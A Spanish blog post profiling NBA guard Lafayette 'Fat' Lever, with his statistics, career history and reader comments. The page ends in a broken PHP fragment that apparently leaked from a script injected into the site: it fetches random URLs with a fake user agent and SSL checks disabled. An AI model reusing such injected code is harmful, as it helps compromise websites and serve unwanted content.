¿Quién fue Lafayette ‘Fat’ Lever?

28 de March de 2012 por txusma

Vamos a hacer una prueba: Utilizando la fantástica herramienta que es www.basketball-reference.com (nunca podremos agradecer lo suficiente su existencia) vamos a buscar la lista de los jugadores que han conseguido terminar una temporada con más de 18 puntos, 8 rebotes y 7 asistencias por partido, unos números a los que actualmente solo Lebron James es capaz de acercarse. El primero de la lista es Oscar Robertson (como no) que lo consiguió hasta en 5 ocasiones. Encontramos también nombres ilustrísimos como Larry Bird, Magic Johnson, Wilt Chamberlain, Michael Jordan o John Havliceck y a un Grant Hill que el año que lo consiguió (1997) era todo un sputnik en los Pistons. Pero ahí, empatado con Larry Bird, nos fijamos en el nombre de Fat Lever que consiguió semejante proeza en 3 temporadas consecutivas con los Nuggets.

Buceando un poco por internet también podemos comprobar que sólo ha habido 3 jugadores en anotar más de 15 puntos, capturar más de 15 rebotes y repartir más de 15 asistencias en un partido de playoffs. Son Jason Kidd, Wilt Chamberlain y… Fat Lever. ¿Alguien sabe qué jugador posee el récord de más balones robados en un cuarto? Fat Lever, con 8. Y una última tarea de investigación: sólo ha habido 4 jugadores en la historia que han conseguido un cuádruple doble en un partido y sólo 1 de ellos (Alvin Robertson) lo consiguió sumando los robos a las otras 3 estadísticas habituales. Pero, ¿qué jugador ha conseguido más partidos de más de 10 puntos, rebotes y asistencias y más de 5 robos? Ya os lo digo yo: Fat Lever, en 10 ocasiones.

Pero, ¿quién es este hombre que ni siquiera tiene un artículo decente en la Wikipedia?

Lo primero que llama la atención después de conocer todos los datos que os he expuesto es que Fat Lever era un base-escolta de apenas 1’91 metros de altura. Con esa altura fue capaz de promediar 6 rebotes por partido durante toda su carrera con temporadas por encima de los 9 rebotes. De hecho, es el único jugador de menos de 1’95 capaz de capturar más de 8 rebotes por partido en una temporada y lo consiguió ¡4 veces!

Lafayette Lever nació en Arkansas en 1960 y se formó en la universidad de Arizona State donde compartió vestuario con Byron Scott.  Su número 12 ha sido retirado este mismo año por la universidad y ya ondea al lado del de otros mitos universitarios como Lionel Hollins, Joe Caldwell y el mismo Byron. A la universidad ya llegó con el sobrenombre de ‘Fat’ escogido simplemente para acortar el “fabuloso” nombre que le dio su madre al nacer. Es uno de los 3 jugadores de la ASU capaces de robar más de 200 balones y repartir más de 400 asistencias en toda su carrera universitaria y tiene el récord de más robos en una sola campaña con 76 (2’8 de media). Fue escogido en 2 ocasiones en el quinteto ideal de la conferencia y obtuvo una mención en los nombramientos All-American de 1982.

Todos estos éxitos le llevaron a ser escogido por los Portland Trailblazers en la undécima posición del draft de 1982 (el draft de James Worthy y Dominique Wilkins). Lever se pasó 2 campañas compartiendo el puesto de base con Darnell Valentine, otro joven escogido un año antes en el draft. Entre los 2 venían promediando unos 20 puntos y 10 asistencias por noche. Al final de 1984 los Blazers llevaron a cabo uno de los peores traspasos de la historia de la NBA producto de la elección de Sam Bowie en el draft de aquel año. La elección del pívot de los Kentucky Wildcats provocó que otros pívots de la plantilla como Calvin Natt o Wayne Cooper pasaran a ser prescincibles y además, el equipo técnico decidió que Valentine sería su apuesta en el rol de base titular. ‘Fat’ Lever se había convertido también en un lujo innecesario. Los Blazers empaquetaron estos 3 jugadores y junto una 2ª ronda y una 1ª los traspasaron a los Nuggets a cambio de Kiki Vandeweghe, un grandísimo anotador que tan solo aportó 3 buenas temporadas a la franquicia de Oregón.

En Denver le dieron la batuta desde el primero minuto y Fat Lever respondió a la perfección: En la temporada 1984-1985 promedió 12 puntos, 5 rebotes, 7’5 asistencias y 2’5 robos por partido, su peor temporada de todas las que disputó con los Nuggets. Junto a otros bases y escoltas del equipo como T.R. Dunn, Mike Evans o Elson Turner, conformó uno de los backcourt más ‘ladrones’ de la historia. Fueron los únicos, aquella campaña, que consiguieron más robos que pérdidas. Calvin Natt y Wayne Cooper, traspasados junto a Lever y titulares en los Nuggets, promediaron 23 puntos-7 rebotes y 12 puntos-8 rebotes, respectivamente. Los Blazers se tiraban de los pelos. Aquella temporada los Nuggets mejoraron su balance y ganaron 14 partidos más. En postemporada llegaron a la final de conferencia en la que cayeron contra los Lakers en 5 partidos protagonizando una de las mejores campañas de la historia de la franquicia.

La temporada siguiente fue prácticamente calcada estadísticamente hablando para Lever y en la 1986-1987 llegó la explosión. Promedió 19 puntos, 9 rebotes, 8 asistencias y 2’5 robos por partido. Os dejo que releáis los datos. Aquella temporada consiguió 16 triples-dobles, récord de la competición que rompió posteriormente ‘Magic’ Johnson con 17, incluyendo 3 consecutivos logrados entre el 24 y el 29 de Enero de 1987. Midiendo 1’91 era el máximo reboteador del equipo con mucha distancia. Wayne Cooper tan solo promedió 5’2. Increíblemente Lever no fue seleccionado para el All-Star aquella campaña pero su esfuerzo y calidad fue recompensado con una selección para el 2º mejor quinteto de la temporada. Solo dos monstruos como Magic y Jordan le apartaron del primer quinteto.

Lever demostró que lo de aquella temporada no había sido flor de un día y durante 4 campañas deleitó a los aficionados con números sobrehumanos y actuaciones increíbles. Sus números en la 1987-1988 fueron prácticamente calcados y dejó para la posteridad los 31 puntos, 16 rebotes, 12 asistencias y 6 robos de un partido frente los Bulls (aunque hay vídeos que atestiguan que consiguió 9 robos); los 20 puntos, 20 rebotes, 12 asistencias y 6 robos de un partido frente Cleveland o los 21 puntos, 13 rebotes, 14 asistencias y 8 robos frente los Nets. Cuesta pensar que un mismo jugador pudiera ofrecer tantas y tantas actuaciones parecidas. Y en las siguientes temporadas continuó ofreciendo triples-doble inverosímiles: 15 puntos, 13 rebotes, 23 asistencias, 5 robos ante Golden State en 1989; 20 puntos, 22 rebotes y 11 asistencias frente los Spurs en 1990…

Los Nuggets se clasificaron para Playoffs en cada una de esas 4 temporadas en las que Lever literalmente explotaba a prácticamente cada partido, a pesar de que el equipo iba bajando el nivel poco a poco debido a la edad y el desgaste. En 1990 la mayoría de jugadores ya no estaban en condiciones de seguir practicando el estilo de juego rápido y vistoso que habían llevado a cabo durante tanto tiempo y llegó el momento de reconstruir. Fat Lever fue traspasado a los Mavs a cambio de 2 primeras rondas para completar un gran backcourt junto Rolando Blackman y Derek Harper. Nunca se pudo comprobar como hubiera funcionado el equipo porque a los 4 partidos, Lever sufrió una lesión de rodilla que le obligó a perderse toda la temporada. Reapareció en 1991 pero sufrió una segunda lesión que le hizo perderse casi 60 partidos de esta temporada y toda la temporada siguiente. Finalmente, a la edad de 33 años pudo disputar su primera temporada completa con los Mavs, la 1993-1994. Jugó 81 partidos, 54 de titular tras el traspaso de Derek Harper a New York y aunque sus rodillas no le permitían grandes alegrías y acabó con registros mínimos históricos en la mayoría de apartados estadísticos, aún nos dejó para el recuerdo un partido frente los Bullets en el que robó 9 balones. En su último partido como profesional fue el máximo reboteador de los Mavs con 9 capturas. Gran punto y final para lo que había sido su carrera.

Sin duda, Fat Lever es uno de los grandes olvidados de la liga. A pesar de proporcionar 4 temporadas memorables solo fue seleccionado 2 veces para el All-Star, una para el 2º mejor quintento defensivo y una vez más para el 2º mejor quinteto de la temporada. Como muestra un botón: La temporada 1988-1989 promedió 19’8 puntos, 9’3 rebotes, 7’9 asistencias y 2’7 robos pero no fueron suficientes para ser seleccionado para el All-Star ni para ninguno de los 3 quintetos de la temporada.

Gran anotador cuando se requería, gran distribuidor, mejor profesional, inteligencia innata para ir al rebote, uno de los mejores ‘ladrones’ de todos los tiempos… y eso perdiendo muy pocos balones (de hecho, promedió en su carrera más robos que pérdidas). Creo que es hora de empezar a hacer justicia al mejor base de la historia de los Nuggets y uno de los mejores de la NBA, por mucho que las crónicas parezcan decididas a olvidarle.

Comenta

12 comentarios a esta entrada

  1. German dice:
    #1

    Gran articulo. Da gusto entrar todos los dias al blog y aprender siempre algo nuevo. Vaya crack este hombre.

    PD: El cuadruple doble de Alvin Robertson fue el unico de puntos-rebotes-asistencias-robos.

      Citar

  2. Sancho88 dice:
    #2

    Woww!!! Genialísimo artículo Txus. Es increíble como podemos sabernos de memoria las “hazañas” de un innombrable como Bruce Bowen, y sin embargo se nos pueden escapar biografías de tal calibre como la de Lever… Realmente, en el baloncesto profesional cada día se tiende más a la especialización, y se fomenta mucho menos el aprendizaje de todas las facetas del juego. Ahí es donde cobra mucho valor un jugador como Lebron James, que al igual que Lever, es capaz de hacer de todo. Yo creo que si Lever jugase hoy, se le valoraría mucho más, porque son muy escasos los ejemplos de jugadores tan tan completos hoy en día. Currada enorme para mantener el nivel del blog. Yo no tengo ni idea de cómo os encontré, pero sí sé que la primera página que visito todos los días es la vuestra. Imposible encontrar más calidad por centímetro cuadrado de papel virtual. Enormes!!

      Citar

  3. Txusma dice:
    #3

    Error imperdonable! Gracias German por recordar el cuádruple-doble de Alvin Robertson. Tendré que variar mínimamente el artículo.

      Citar

  4. Ekos dice:
    #4

    Un 10 como artículo, sin duda uno de los grandes olvidados del baloncesto, tengo que reconocer que no lo conocía, y seguro que como él hay más, muchos más. Por cosas como ésta merece la pena visitar este blog.

    Estoy con Sancho, se echan de menos jugadores tipo point-forward, vamos, completísimos.

      Citar

  5. Vader dice:
    #5

    Gran artículo!! Felicidades!!!

      Citar

  6. The wolf dice:
    #6

    este tipo de cosas engrandecen este blog que ya de por si era grande, gran articulo txus!

      Citar

  7. Juan_Taf13 dice:
    #7

    Gran artículo. Comparado con otros blogs de baloncesto más conocidos creoque deberíais estar en la élite del periodismo baloncestístico. Enhorabuena.

      Citar

  8. dsromero dice:
    #8

    genial articulo.

    Lo de que sea un olvidado hasta en la wikipedia tiene fácil solución … puedes usar este articulo para ampliar la entrada en castellano… yo lo dejo ahí por que no me voy a apuntar un tanto que no me corresponde, sino yo mismo incluiría el texto en la enciclopedia { anda que no molaría que la entrada en castellano fuera mejor que la inglesa xD }

      Citar

  9. Jose Luis dice:
    #9

    A la wikipedia, si señor!!

      Citar

  10. Sancho88 dice:
    #10

    De hecho, hoy se debería fundar oficialmente la blogtjnbapedia, xd

      Citar

  11. Txusma dice:
    #11

    dsromero:
    genial articulo.

    Lo de que sea un olvidado hasta en la wikipedia tiene fácil solución … puedes usar este articulo para ampliar la entrada en castellano… yo lo dejo ahí por que no me voy a apuntar un tanto que no me corresponde, sino yo mismo incluiría el texto en la enciclopedia { anda que no molaría que la entrada en castellano fuera mejor que la inglesa xD }

    Estaba releyendo el artículo y no había leído los últimos comentarios. Yo no tengo tiempo de meter el artículo en la Wikipedia pero la verdad es que me haría ilusión que alguien lo hiciera a partir de la información que conseguí recabar.

      Citar

  12. MagicJohnson32 dice:
    #12

    Pues yo aprovecho para felicitarte por el artículo, cosa que no sé por qué no hice en su momento. Muy grande.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>